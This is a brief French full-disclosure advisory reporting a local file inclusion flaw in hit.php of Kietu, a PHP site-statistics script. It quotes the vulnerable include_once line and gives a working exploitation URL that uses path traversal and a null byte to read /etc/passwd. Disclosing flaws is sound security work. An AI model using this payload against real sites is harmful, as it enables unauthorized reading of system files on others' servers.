[Full-disclosure] Local File Inclusion : Kietu

[::] Produit : Kietu

[::] Langage : PHP

[::] Description : Kietu? est un script ecrit en PHP, qui
requiert une base de donnee mySQL, et qui vous permet de generer et
consulter les statistiques d'acces a votre site web.

[::] Site web officiel : http://www.Kietu.net/

[::] Page vulnerable : hit.php

[::] Faille de securite : Local File Inclusion

[::] Code vulnerable : ( Ligne 2 ) -> include_once
$url_hit.'class/kdetect.class.php';

[::] Exploitation :
http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Credit : Avis de securite par cdg393 ->
cdg393_gmail_com :)